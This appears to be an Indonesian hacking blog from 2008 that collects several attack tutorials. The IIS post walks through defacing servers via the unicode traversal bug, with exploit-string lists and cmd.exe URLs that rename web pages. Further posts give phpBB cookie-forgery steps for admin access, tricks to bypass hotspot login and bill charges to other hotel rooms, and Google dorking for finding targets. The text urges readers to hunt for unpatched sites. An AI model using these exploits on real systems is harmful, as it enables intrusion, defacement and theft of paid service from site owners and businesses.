Deface adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan sebuah situs. Tentu saja prosesnya dilakukan dengan memanfaatkan kelemahan dari situs tersebut, sehingga kalo loe adalah web master dan loe ngerubah tampilan halaman situs yang loe punya tentu saja itu nggak bisa disebut deface...heheheh. Banyak yang bertanya "gimana sich nge-deface situs?" seperti yang telah gue sebutin diatas proses deface dilakukan dengan memanfaatkan lubang (hole) yang terdapat pada server tempat situs itu berada. Sehingga hal pertama yang harus kamu ketahui untuk melakukan proses deface adalah OS (Operating System) dari server situs tersebut. Hal ini karena karakteristik dari tiap OS yang berbeda-beda, contohnya antara IIS dengan BSD tentu saja sangat berbedaapabila kita ingin melakukan deface diantara kedua OS tsb. Operating
System atau OS biasanya kalo gue sich gue kelompikin ke 2 keluarga besar,yaitu :
1. IIS (server untuk microsoft, dkk)
2. Unix(linux,BSD,IRIX,SOLARIS,dsb)

Nah kita kelompokin jadi 2 gitu aja yah..:) sekarang saya coba jelaskan satu-satu.

~*~DEFACING NT WEB SERVER WITH BUG UNICODE MICROSOFT IIS~*~
-------------------------------------------------------------

Melalui tutor ini saya teh hanya ingin berbagi pengalaman mengenai cara men-deface website yang
menggunakan Microsoft Internet Information Server atau Microsoft IIS. Harap DeFaceR (sebutan bagi org yg suka deface..;p) ketahui...Microsoft Internet Information Server atau MS IIS 4.0/5.0 memiliki suatu bug yang dinamakan "unicode bug". Sayah tidak akan menjelaskan panjang lebar mengenai "unicode bug" ini karena sayah takut salah menjelaskan (ssSSTTtHHH!! jgn bilang sapa2 yah sebenernyah sayah teh emang gak tau ...ehehehheehhe..;p~). Yang jelas dengan bug ini kita bisa mengeksplorasi komputer target dengan hanya menggunakan internet browser.

OK...mari kita mulai...Pertama kita cari site site target terlebih dahulu di search engine (google,yahoo,dll)...key nya terserah kowe.....Lalu utk mengetahui site itu menggunakan
MS IIS 4.0/5.0...Kita scan terlebih dahulu di www.netcraft.com......dapat site yah..??...Okeh..
setelah kita mendapatkan site yg menggunakan MS IIS 4.0/5.0 ...Langkah selanjutnya utk mengetahui site tersebut belum di-patch bug unicode nya mari kita scan site tersebut di mirc (utk mengeteahui cara scan lewat mirc....coba koe buka http://www.jasakom.com/hacking.asp page 3 Scanning Exploit Unicode Dengan MIRC),bisa juga memakai sopwer yg bisa and DL di http://accessftp.topcities.com/.... or memakai cara manual yg lebih sering sayah gunakan ehehhehehhee...contoh:

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

Ada dua kemungkinan yang tampil pada browser Anda yaitu:
Kahiji : Muncul pesan ERROR ...
Kaduana : Muncul daftar file-file dari drive C pada komputer server target. Bila ini terjadi maka
www.targethost.com tadi ada kemungkinan untuk bisa kita deface...

Mari kita perhatikan URL aneh bin ajaib diatas. Akan sayah bagi URL diatas menjadi empat bagian yaitu :
• Bagian host, yaitu "http://www.targethost.com"
• Bagian exploit string, yaitu "/scripts/..%255c..%255c"
• Bagian folder, yaitu "/winnt/system32/"
• Bagian command, yaitu "cmd.exe?/c+dir+c:\"

Kita lihat pada bagian command diatas menunjukkan perintah "dir c:\" yang berarti melihat seluruh
file-file yang berada pada root drive C. Koe bisa mencoba perintah yang lain seperti "dir d:\"
atau yang lain. Ingat, Koe harus mengganti karakter spasi dengan tanda "+". Koe bahkan bisa menge
tahui konfigurasi IP address komputer tujuan dengan mengetikkan perintah "ipconfig.exe /all"

Selain itu ada beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error pada
browser koe. Untuk itu koe ganti sajah bagian eksploit stringnyah, eksploit string yg sering
tembus adalah :
- /cgi-bin/..%255c..%255c
- /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af..
- /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /scripts/..%255c..%255c

Jika semua pilihan eksploit string diatas masih memunculkan pesan error pada browser koe maka
kemungkinan besar IIS pada web server sudah di-patch bug unicode nya (OR IE kowe yg lagie dodolss ...hiheiehiehiehei). Dan koe bisa memilih situs lain sebagai sasaran....(yg sabar yah nak nyari targetnyah...ehehhehehe).

Lanjuttt......udeh dapet site yg bug unicodenyah gak di patch..??....Langkah berikutnya adalah
mengetahui di folder manakah diletakkan dokumen-dokumen web seperti default.htm/html/asp,,
index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,.ada juga yg pake .php/php3/shtml.
Folder ini dinamakan web root. Biasanya web root berada di C:\InetPub\wwwroot\ atau
D:\InetPub\wwwroot. Tapi terkadang web administrator menggantinya dengan yang lain. Untuk mengetahuinya koe cukup mengetikkan URL seperti di bawah ini

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+set

URL diatas akan menampilkan daftar environment variable dari web server sasaran. Kebuka..??...
Nah tugas koe skrg adalah mencari PATH_TRANSLATED atau tulisan PATH_TRANSLATEDnyah...gak ada yahh ..??...coba deh koe ripresh lagehh...udah ketemuuu...nah skrg kita DIR deh tuh si PATH_TRANSLATED nyah.....Kita ambil contoh PATH_TRANSLATEDnyah : C:\InetPub\wwwroot....Perintahnya ng-DIR nyah :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot

Huaaaaaaa....isinyah banyak banged yahh.....mana dokumen2 web yg kita curigain itu ada 3 bijih
lagehh....hemm santeyy...oiyahh...lupa sayah...Tugas kita setelah ng-DIR PATH_TRANSLATEDnyah.....
truss kita cari dokumen web itu disitu utk kita RENAME....gemana kalo misalnyah dokumen2 web yg kita curigain itu ada 3..santeyy...coba skrg koe buka site aslinyah di laen window....
http://www.targethost.com == neh yg ini......di situ kan alias di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
dokumen2 web nyah ada 3 macem pasti kita bingung yg mana neh yg mo di RENAME....misalnya : di

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot itu ada :
Directory of C:\InetPub\wwwroot
07/20/01 03:21p 1,590 default.htm
07/20/01 03:21p 590 index.html
07/20/01 03:21p 3,453 main.html

Udah di buka kan site aslinyah...nah coba masukin salah satu dokumen web itu di site asli nyah...
contoh : http://www.targethost.com/default.htm kita liad hasilnya apa kah sama gambarnya (halaman depannya) setelah kita masukin dokumen web tadee.waww ternyata tidak sama hemm.coba masukin lageh salah satu dokumen web itu site aslinyah.mMmm..kita masukin yg main.html.waww waww..ternyata sama gambarnyahh.Nah skrg kita RENAME deh yg main.html ituu. perintahnya :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ren+C:\InetPub\wwwroot\main.html+gue.html

Lihat apa yg terjadi di IE kitaa

CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Access is denied

Yahhhh..akses dineyy.hiekksss jgn nyerah bro` kita carih lageh targetnyah okeHh !!!Dapat
targetnyah..??udah di RENAME nyah??.Hasilnya setelah di RENAME seperti di bawah ini bukan??

CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :

Kalo iyahh.waaa selamat anda telah merubah or berhasil men-deface halaman depan web site
tersebut.kalo gak caya buka ajah site aslinyah pasti ERROR kann ehehhehehhee
(Jgn lupa kita simpan C:\InetPub\wwwroot\main.html *file yg kita rename tadi di notepad utk
langkah selanjutnyah*)

Sekarang koe tugasnyah meng-upload file koe ke site tadee Ada dua cara my bro` Pertama lewat ECHO..
Kedua lewat TFTP32.

*Cara pertama :*
Utk meng-upload file lewat echo sebelumnyah kita harus mengcopy file cmd.exe pada direktori
C:\winnt\system32 ke suatu folder lain atau folder yang sama dengan nama lain, misalnya cmdku.exe
. Untuk meng-copy cmd.exe menjadi cmdku.exe pada folder winnt\system32 maka cukup ketik URL
berikut :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+

Langkah-Langkah Deface PHPBB/PHPBB2 Loser_cs_20

2008-02-02T02:04:00.000-08:00

1. Download browser Mozilla FireFox

2. Download pluginnya yg bernama LiveHTTPHeader
download di http://livehttpheaders.mozdev.org/installation.html
cari yg paling baru

3. selanjutnya cari target dengan Uncle Google dgn syntax :
phpBB site:[terserah apa aja]

4. setelah itu buka plugin yg kita download tadi di Tools -> LiveHTTPHeader

5. Ingat, isi LiveHTTPHeader harus kosong

6. buka situs target, dengan begitu LiveHTTPHeader akan mengambil semua cookie yg tercatat di halaman target

7. setelah halaman sukses terbuka ditandai dengan tanda "done" di bawah browser, langkah selanjutnya adalah mengklik LiveHTTPHeader di bagian tengahnya dilanjutkan mengklik opsi Replay..

8. setelah LiveHTTPReplay terbuka liat bagian seperti dibawah ini pada LiveHTTPReplay...

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b

9. Hapus bagian yg belakang setelah tanda semi colon (

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b

\_______________hapus bagian ini_________________/

jadinya akan seperti ini :

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D

10. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi

11. selanjutnya perhatikan langkah di bawah ini:

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D
\________hapus bagian ini dan di ganti dengan:

Cookie: phpbb2mysql_data=a:2{s:11:"autologinid";s:32:"602baahpepms74d4cb6f2d012e1e4019";s:6:"userid";s:1:"2";}

12. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi tadi.

13. perhatikan lagi langkah ini:

Cookie: phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"602baahpepms74d4cb6f2d012e1e4019";s:6:"userid";s:1:"2";}
\___________________________bagian ini jg digantilagi_______________________________/

menjadi seperti ini:

Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

14. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi tadi.

15. selesai, silakan liat halaman target, kalo anda beruntung anda mendapatkan full admin.
Silakan pergi ke bawah halaman dan lihat opsi "Go To Administration Panel" telah muncul

Wireless Hotspot Hacking

2008-02-02T01:53:00.000-08:00

Pendahuluan
Wireless hotspot merujuk pada implementasi jaringan wireless (nirkabel) yang memanfaatkan protokol IEEE 802.11x untuk keperluan akses Internet publik. Implementasi jaringan wireless ini dapat digunakan tanpa bayar, biasanya akses diberikan oleh penyedia layanan untuk keperluan promosi, atau berbayar.
Di kota-kota besar di Indonesia, seperti Jakarta, Bandung, dan Surabaya, wireless hotspot dapat ditemukan di mall, plaza, hotel, atau airport. Dengan ekspetasi pengguna yang beragam, dari geek sampai mereka yang gagap teknologi, maka wireless hotspot didesain untuk memberikan kemudahan dalam penggunaan. Oleh karena itu, kebanyakan wireless hotspot tidak memberikan perlindungan penuh terhadap penyalahgunaan jaringan wireless.
Menggunakan Wireless Hotspot
Jika Anda belum pernah memanfaatkan layanan wireless hotspot, maka langkah-langkah berikut dapat Anda lakukan ketika Anda berada dalam jangkauan akses wireless hotspot.
Siapkan device yang akan digunakan untuk mengakses wireless hotspot.
Device dapat berupa laptop, PDA, atau telepon selular.
2. Asosiasikan device Anda pada hotspot SSID (Service Set Identifier)
untuk mendapatkan konfigurasi jaringan. Biasanya jaringan wireless
hotspot menggunakan layanan DHCP untuk keperluan ini.
Gunakan web browser untuk mulai mengakses Internet. Jika Anda
mendapatkan tampilan web yang meminta login username dan password
(terkadang cukup password saja), maka Anda harus memasukan username
dan password yang sudah disiapkan. Jika Anda dapat langsung
menggunakan akses Internet, Anda beruntung. Dan mungkin Anda tidak
perlu membaca kelanjutan dari artikel ini. Namun kalau Anda hanya
dapat mengakses beberapa website tertentu saja, besar kemungkinan
Anda akan diminta username dan password untuk mengakses website
yang lainnya.
4. Jika Anda sudah memasukkan username dan password, dan berhasil
terautentikasi. Anda selanjutnya dapat mengakses Internet sampai
kredit akses Anda habis atau perhitungan akses dihitung setelah Anda
menggunakan akses Internet (ini biasanya berlaku bagi mereka yang
juga adalah pelanggan penyedia layanan Internet).
Mendapatkan Akses
Beberapa cara yang dapat dilakukan untuk mendapatkan akses wireless hotspot, tergantung dari penyedia layanan, namun secara garis besar Anda dapat melakukan hal-hal berikut:
1. Membeli prepaid card. Penyedia layanan seperti CBN, Indosat, dan BizNet menyediakan prepaid card dengan nominal tertentu.
2. Membayar hak akses dengan kartu kredit. Berlaku jika penyedia layanan memberikan pilihan ini. Saya hanya menemukan fitur ini pada wireless hotspot di luar negeri.
3. Registrasi via SMS. Penyedia layanan wireless hotspot yang juga penyedia layanan telekomunikasi selular bergerak biasanya memberikan kemudahan pada pelanggannya. Hak akses online pada wireless hotspot dapat ditukar dengan nilai kredit kartu telepon selular pra-bayar. Saya pernah menemukan Indosat memberikan layanan ini.
4. Mengalihkan tagihan online pada tagihan kamar hotel. Ini berlaku jika Anda menggunakan layanan wireless hotspot dari kamar hotel dimana harga yang harus dibayarkan nanti seringkali jauh lebih mahal. Sebagai contoh, M@giNET bekerja sama dengan hotel Westin di Kuala Lumpur, untuk memberikan layanan wireless akses bagi mereka yang menginap di hotel tersebut.
5. Melakukan aktivitas social engineering untuk mendapatkan username dan password. Silakan mengira-ngira sendiri karena saya tidak akan membahas hal ini.
6. Mencari jalan keluar sendiri untuk mendapatkan username dan password atau untuk langsung dapat menggunakan layanan akses Internet. Beberapa trik akan dijelaskan pada bagian lain di artikel ini.
Analisis Desain Wireless Hotspot
Beberapa hal yang saya berhasil saya simpulkan dari sejumlah implementasi wireless
hotspot yang telah saya coba, antara lain:
1. Tidak adanya standarisasi untuk setup sebuah hotspot. Dengan kata lain, setup jaringan dari penyedia layanan akan berbeda dengan penyedia layanan yang lain. Hal lain yang berpengaruh adalah pemilihan produk.
2. Banyak dari penyedia layanan wireless hotspot yang memberikan akses roaming, memungkinkan pengguna untuk mengakses layanan di tempat yang berbeda asalkan ada layanan dari penyedia yang dimaksud. Sebagai contoh, jika Anda memiliki hak akses untuk layanan wireless hotspot yang disediakan oleh Indosat, maka Anda dapat mengakses dilebih dari 30 tempat, dengan akses point berjumlah lebih dari 190 buah. Dan sebagai informasi tambahan, kesemua akses point tersebut semuanya terhubung dan dikontrol dari pusat.
3. Autentikasi biasanya digunakan untuk keperluan akses Internet. Yang berarti jika Anda terhubung ke sebuah akses point wireless hotspot namun tidak ingin mendapatkan akses Internet, Anda masih dapat menggunakan jaringan wireless secara lokal dan berhubungan
dengan pengguna jaringan wireless yang lain (jika dan hanya jika penyedia layanan mengijinkan hal ini).
4. Untuk keperluan autentikasi, penyedia layanan biasanya akan menyediakan Internet gateway (yang biasanya terdapat web server, DNS server, database server, dan mail server di dalamnya) dan satu atau lebih akses point. Beberapa produk yang sering digunakan sebagai Internet gateway untuk layanan hotspot antara lain diproduksi oleh ANTLabs (seperti yang digunakan oleh Indosat dan CBN), Nomadix (digunakan oleh M@giNET), perangkat lunak gratis NoCatsAuth atau yang serupa (seperti yang digunakan oleh Melsa).
5. Seringkali tidak ditemukan segregasi jaringan untuk pengguna. Baik bagi mereka yang belum terautentikasi maupun yang belum. Hal ini memungkinkan seseorang melakukan aktivitas hacking terhadap pengguna layanan wireless hotspot yang lain.
6. Juga sering ditemukan para penyedia layanan wireless (ataupun produsen produk Internet gateway) menggunakan aplikasi yang sudah out-of-date. Sebagai contoh, sebuah produk ANTLabs menggunakan Red Hat Linux release 6.2 (Zoot) sebagai sistem operasi.
Terhitung perangkat lunak yang digunakan seperti MySQL, arpd, dan Apache, juga out-of-date.
Mengakali Proses Autentikasi Wireless Hotspot
Ada banyak hal yang seseorang dapat lakukan untuk mengakali proses autentikasi. Beberapa cara yang dibahas dalam artikel ini hanya mencakup sebagian kecil aspek yang memanfaatkan kelemahan desain dari sebuah wireless hotspot gateway. Mengingat bahwa materi sudah pernah dipresentasikan di depan publik, besar kemungkinan penyedia layanan maupun vendor dari produk-produk yang terkena dampaknya sudah
memperbaiki celah-celah yang dimaksud.
Sebagai pemberitahuan, tidak ada nama vendor yang akan diasosiasikan dengan celah yang saya temukan. Silakan mengira-ngira sendiri. Dan trik-trik yang dijelaskan hanya dapat direplikasikan jika Anda berada dalam environment sistem operasi berbasis Unix/Linux (kebetulan saya menggunakan Mac OS X).
1. Memanfaatkan demo account.
Banyak penyedia layanan yang berbaik-hati memberikan kesempatan bagi calon pengguna untuk dapat mengakses Internet dalam kurun waktu yang dibatasi. Pada halaman autentikasi biasanya disebutkan username dan password untuk keperluan ujicoba. Seseorang yang menggunakan account ujicoba/demo harus melakukan autentikasi ulang setelah masa penggunaan berakhir. Namun hal tersebut dapat dilakukan secara otomatis dengan menggunakan script seperti ini.
———————————————————————
#!/bin/sh
while sleep 3;
do
curl –data
“username=demo&password=demo&submitForm=login”
“https://server:port/goform/HtmlLoginRequest”;
done
———————————————————————
2. Menggunakan tunneling.
Beberapa implementasi hotspot dapat diakali dengan memanfaatkan metode tunneling. Implementasi yang dimaksud adalah implementasi yang tidak melakukan pemblokiran terhadap port atau protokol tertentu. 0×05
Sebagai contoh, sebuah hotspot hanya melakukan pengalihan untuk semua query HTTP dan HTTPS ke halaman login autentikasi bagi pengguna yang belum terautentikasi. Anda dapat menggunakan socks-tunneling via SSH karena port yang digunakan untuk SSH tidak terfilter. Anda dapat menambahkan option ‘DynamicForward’ pada konfigurasi SSH user Anda (lihat file ~/.ssh/config).
——————————————————————–
…
Host titanium
Hostname titanium.justanotherrandomdomain.com
Port 22
User whfb
DynamicForward 22344
…
——————————————————————–
Jika Anda sudah melakukan koneksi SSH ke host titanium, maka secara otomatis, port 22344 akan terbuka. Anda dapat menambahkan IP 127.0.0.1 dan port 22344 pada konfigurasi jaringan di web browser Anda untuk pilihan SOCKS proxy.
Namun cara yang disebutkan di atas tidak selalu berhasil karena gateway melakukan pengalihan pada semua port TCP dan UDP. Untuk mengakali kondisi tersebut, jika dapat memanfaatkan DNS tunneling. Mengapa protokol DNS? Karena sebagian besar penyedia layanan tidak melakukan pemblokiran atau pengalihan untuk query DNS.Silakan merujuk pada referensi DNS Tunneling[3][4][5][6][7].
3. Memanfaatkan celah pada aplikasi web portal Internet gateway.
Trik berikut saya temukan ketika saya yang kebetulan mendapatkan kesempatan untuk menginap di salah satu hotel terkenal dan menemukan adanya layanan wireless hotspot yang terdapat di lobby. Pada halaman autentikasi, saya diberikan beberapa pilihan untuk
melakukan pembayaran, antara lain:
a. login menggunakan username dan password dari pre-paid yang dapat dibeli di lobby,
b. login menggunakan username dan password dari layanan iPass dan Boingo
Setelah mengamati benar source-code dari halaman web yang digunakan untuk keperluan autentikasi, saya melihat adanya kejanggalan dimana pilihan a mempunyai billing_method_id adalah 2, dan pilihan b mempunyai billing _method_id adalah 3. Yang jadi pertanyaan saya waktu itu adalah pilihan apa yang mempunyai billing_method_id
adalah 1. Dengan niatan mencoba-coba, saya lalu mengganti variable query billing_method_id dengan nilai 1, ternyata saya dapat langsung mengakses Internet.
——————————————————————–
http://host/defaultportal/check_form.cgi?&billing_method_id=1
——————————————————————–
Belakangan hari setelah saya berkesempatan meminjam produk yang digunakan sebagai Internet gateway tersebut, saya mengetahui bahwa billing_method_id dengan nilai 1 adalah pilihan untuk melakukan penagihan pada kamar. Sesuatu yang tidak mungkin dilakukan karena saya mengaksesnya dengan menggunakan wireless dari lobby. Setelah
berkorespondensi dengan technical support vendor produk yang dimaksud, saya baru mengetahui bahwa pilihan tersebut hanya efektif jika pelanggan menggunakan kabel dan bukan wireless.
4. Mengganti IP address
Ditemukan beberapa implementasi wireless hotspot yang diketahui membagi alokasi IP address pada pengguna yang belum terautentikasi dan user yang sudah terautentikasi. Setelah pengguna berhasil melewati proses autentikasi, gateway akan mengingat MAC address Anda dan memberikan IP address baru (pada subnet yang baru) bagi pengguna tersebut.
Menggunakan perangkat lunak packet sniffer seperti tcpdump atau ethereal (sekarang wireshark), Anda dapat mengetahui IP address apa saja yang melintasi jaringan wireless Anda. Anda dapat mengira-ngira sendiri alokasi IP address yang ‘baru’ berikut dengan netmask-nya. Sebagai contoh, jika belum terautentikasi Anda mendapatkan IP address 10.0.0.14 dengan netmask 255.255.255.0, dan setelah Anda terautentikasi, Anda mendapatkan IP address 10.0.1.18 dengan netmask 255.255.255.0.
Jika Anda tidak ingin melakukan proses autentikasi, Anda cukup mengkonfigur IP Address Anda pada range network pengguna yang sudah terautentikasi.
5. Piggyjacking
Saya mendefinisikan piggyjacking sebagai aktivitas untuk mendapatkan akses pada sebuah sesi akses wireless dengan mengambil-alih sesi yang sudah terlebih dahulu terautentikasi untuk mendapatkan akses Internet.
Untuk melakukannya, Anda membutuhkan informasi:
- IP address dan MAC address pengguna yang sudah terautentikasi
- IP address gateway
Anda dapat merujuk pada presentasi Dean Pierce, Brandon Edwards & Anthony Lineberry yang diberikan di DEFCON 13[8] untuk penggunaan perangkat lunak ‘pul’. Jika Anda ingin melakukan dengan metode manual, Anda dapat mengikuti prosedur yang disebutkan pada point 4 di atas.
6. SQL Injection pada aplikasi portal gateway
Beberapa hotspot ternyata dapat diakali dengan memanfaatkan teknik SQL injection. Saya pikir tidak perlu menjelaskan lebih jauh mengenai teknik ini karena sudah seringkali dibahas. Tidak hanya untuk mem-by-pass akses Internet, teknik ini juga dapat mem-by-pass autentikasi administrative page.
7. Memindahkan tagihan ke kamar lain.
Jika Anda beruntung menginap pada hotel yang memberikan layanan Internet berbayar menggunakan kabel pada kamar hotel. Anda mungkin dapat menerapkan trik ini. Trik berikut ini hanya dapat dilakukan pada jaringan kabel pada hotel (tidak berhubungan dengan wireless), namun saya bahas di sini karena produk gateway yang digunakan sama
dengan layanan wireless hotspot. Anda mungkin dapat ‘menyusahkan’ orang lain dengan mengalihkan tagihan Internet kamar Anda atau mengalihannya ke kamar kosong.
Sebagai contoh, Anda dapat memodifikasi query HTTP seperti berikut ini
——————————————————————–
http://HOTSPOT_GATEWAY/mlcbb/mlc/welcome.asp?UI=012345&
UURL=http://BILLING_SERVER/userok.htm&MA=00AABBCCDDEE&RN=1234&
http://google.com/&SC=12345
——————————————————————–
Anda cukup menganti nilai 00AABBCCDDEE (MAC address) dan 1234 (nomor kamar). Tagihan akan ditujukan pada kamar baru jika kamar tersebut ada.
Untuk amannya, saya menyarankan Anda mencari informasi nomor ruangan yang digunakan untuk keperluan publik seperti ballroom atau lobby.

Penulis : willhackforbandwidth
Sumber : www.echo.or.id

google hack

2008-02-02T01:32:00.000-08:00

Banyak sekali website yang berguguran dengan memanfaatkan pencarian pada
Google untuk menemukan targetnya. Seperti Worm Santy yang melakukan
defacing secara massal dengan memanfaatkan Google. Dalam hitungan hari
ribuan website tampilan utamanya berubah.

Tulisan ini dibuat untuk memahami bagaimana melakukan pencarian yang baik
dengan menggunakan Google. Pada bagian akhir juga terdapat trik-trik dan
keyword yang sering digunakan untuk melakukan pencarian file dan juga
bagaimana mencari target dengan memanfaatkan Google.

--- 01 // Penggunaan Dasar -----------------------------------------------

- Google tidak "case sensitive".
Keyword: linux = LINUX = LiNuX
Akan menghasilkan hal yang sama

- AND: Secara Default Google menggunakan keyword and.
Keyword: menjadi hacker
Hasilnya pencarian akan mengandung kata "menjadi" dan "hacker"

- OR: Digunakan untuk menemukan halaman yang setidaknya berisi salah
satu dari keyword. Note: OR dituliskan dengan huruf besar semua.
Keyword: hacker OR cracker
Hasilnya pencarian akan mengandung kata "hacker" atau "cracker"

- +: Google akan mengabaikan pencarian dengan kata-kata umum seperti
"how" dan "where". Jika kata-kata umum ini begitu penting, anda
bisa menambahkan "+" didepan keyword tersebut.
Keyword: hacker how ==> Kata "how" akan diabaikan
Keyword: hacker +how ==> Kata "how" akan diikutsertakan

- -: Tanda minus "-" bisa digunakan untuk mengecualikan kata-kata
tertentu dalam pencarian. Misal kita ingin mencari kata
"linus tanpa linux", kita bisa menggunakan "linus -linux"

- *: Google tidak mendukung pencarian * sebagai pengganti huruf.
Misalkan kita ingin mencari dengan kata depan menja*
Google tidak mencari kata "menjamu", "menjadi", "menjalar", dll
Google akan menghasilkan pencarian hanya yang mengandung kata
"menja".

Tetapi google mendukung penggunaan * dalam pencarian kalimat.
Keyword: "menjadi * hacker"
Hasilnya pencarian dapat menghasilkan "menjadi seorang hacker",
"menjadi white hacker", dll.

- "": Dapat digunakan untuk mencari kata yg lengkap.
Keyword: "menjadi hacker"
Hasilnya pencarian akan mengandung kata "menjadi hacker"

- ?: Dapat digunakan untuk mencari pada direktori Google
Keyword: ?intitle:index.of? mp3

--- 02 // Operator Spesial -----------------------------------------------

-- Contoh hasil pencarian --

Google --> Judul
... Language Tools. Ways to help with tsunami relief \
Advertising Programs - About Google ©2005 Google - > Deskripsi
Searching 8,058,044,651 web pages. /
www.google.com/ - 3k - 5 Jan 2005 --> URL

-- Contoh hasil pencarian --

- intitle: Untuk mencari kata-kata dari judul suatu halaman web.
Keyword: intitle:Admin Administrasi
Keyword tersebut akan mencari judul halaman "Admin" dengan
deskripsi "Administrasi"

- allintitle: Untuk mencari kata-kata dari judul halaman web
secara lengkap.
Keyword: allintitle:Admin Administrasi
Keyword tersebut akan mencari judul halaman yang mengandung
kata "Admin" dan "Administrasi"

- inurl: Digunakan untuk mencari semua URL yang berisi kata-kata
tertentu.
Keyword: inurl:Admin Administrasi
Keyword tersebut akan mencari URL yang mengandung kata "Admin"
dengan deskripsi "Administrasi"

- allinurl: Digunakan untuk mencari semua URL yang berisi kata-kata
tertentu.
Keyword: allinurl:Admin Administrasi
Keyword tersebut akan mencari URL yang mengandung kata "Admin"
dan "Administrasi"

- site: Untuk mencari dalam suatu situs tertentu saja
Keyword: site:echo.or.id
Semua pencarian hanya berdasarkan site "echo.or.id"

- cache: Ketika Googlebot mengindeks suatu situs, google akan
mengambil snapshot dari semua halaman yang telah terindeks.
Operator ini membantu melihat halaman-halaman yang telah
dicache.
Keyword: cache:echo.or.id
Misalkan site aslinya sudah tidak aktif, anda tetap dapat melihatnya
pada snapshot/cache yang disimpan oleh Google.

- define: Operator ini digunakan untuk mencari definisi dari frasa
tertentu. Semua kata yang diketik setelah operator ini akan
diperlakukan sebagai satu frasa.
Keyword: define:hacker

- filetype: Jika kita mencari jenis file tertentu yang berisi informasi
yang anda inginkan kita bisa menggunakan operator ini.
Keyword: "hacker" filetype:pdf
Sampai tulisan ini dibuat google support tipe file
# Adobe Portable Document Format (pdf)
# Adobe PostScript (ps)
# Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
# Lotus WordPro (lwp)
# MacWrite (mw)
# Microsoft Excel (xls)
# Microsoft PowerPoint (ppt)
# Microsoft Word (doc)
# Microsoft Works (wks, wps, wdb)
# Microsoft Write (wri)
# Rich Text Format (rtf)
# Shockwave Flash (swf)
# Text (ans, txt)
Ref: http://www.google.com/help/faq_filetypes.html

- link: Untuk mencari tahu berapa banyak link ke suatu situs, kita bisa
menggunakan operator link.
Keyword: link:www.google.com

- related: Untuk mencari halaman yang isinya mirip dengan URL tertentu.
Keyword: related:www.google.com

--- 03 // Manipulasi URL Google ------------------------------------------

> And bisa mengganti interface google dengan mengganti variabel hl
(default google hl=en => bahasa inggris)
Misalkan kita mengubah interface-nya menjadi bahasa Indonesia.
Ex:
http://www.google.com/search?hl=en&lr=&q=site%3Aecho.or.id&btnG=Search
Hasil modifikasi URL
http://www.google.com/search?hl=id&lr=&q=site%3Aecho.or.id&btnG=Search

> Anda dapat mengganti hasil pencarian hanya pada bahasa tertentu. Hal ini
dilakukan dengan modifikasi variabel lr.
(default google lr=lang_en => bahasa inggris)
Misalkan kita hasil pencarian hanya bahasa Indonesia.
Ex:
http://www.google.com/search?hl=en&lr=&q=site%3Aecho.or.id&btnG=Search
Hasil modifikasi URL
http://www.google.com/search?hl=en&lr=lang_id&q=site%3Aecho.or.id&btnG=Search

> Secara default google akan menampilkan 10 site perhalaman. Anda dapat
mengubahnya secara langsung melalui URL-nya, dengan menambahkan variabel
num pada URL :D
Penggunaan num antara 1-100
Ex:
http://www.google.com/search?hl=en&lr=&q=site%3Aecho.or.id&btnG=Search
Hasil modifikasi URL
http://www.google.com/search?num=100&hl=en&lr=&q=site%3Aecho.or.id&btnG=Search

> as_qdr=mx: merupakan variabel lainnya yang dapat digunakan. Variabel ini
digunakan menentukan hasil berdasarkan bulan. x antara 1-12
Ex:
http://www.google.com/search?hl=en&lr=&q=site%3Aecho.or.id&btnG=Search
Hasil modifikasi URL
http://www.google.com/search?hl=en&lr=&as_qdr=m1&q=site%3Aecho.or.id&btnG=Search

> safe=off: arti dari variabel ini filter "SafeSearch" dimatikan. "SafeSearch"
untuk memfilter hasil pencarian sexual.

Dengan pengetahuan di atas anda dapat membuat sendiri form Google di komputer
sendiri. Sehingga tidak perlu lagi mengunjungi http://www.google.com terlebih
dahulu (kecuali anda menggunakan brwoser yang support google secara built-in
atau menggunakan Google Toolbar). Dengan melakukan ini kita bisa menghemat
bandwidth ke luar negeri :D
Karena bandwidth di Indonesia mahal ........

Contoh script google.html lengkap dengan varabielnya.

--- BOF google.html ---

--- EOF google.html ---

